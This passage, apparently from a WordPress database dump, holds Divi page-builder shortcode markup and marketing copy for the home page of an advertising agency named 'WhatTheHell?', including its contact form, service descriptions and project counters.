text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 20:48:30','2020-08-06 20:48:30','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(443,1,'2020-08-06 20:51:09','2020-08-06 20:51:09','marketing strategy for success','marketing strategy for success','','inherit','open','closed','','artboard-5','','','2020-08-07 16:40:22','2020-08-07 16:40:22','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg',0,'attachment','image/jpeg',0),(444,1,'2020-08-06 20:51:57','2020-08-06 20:51:57','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" 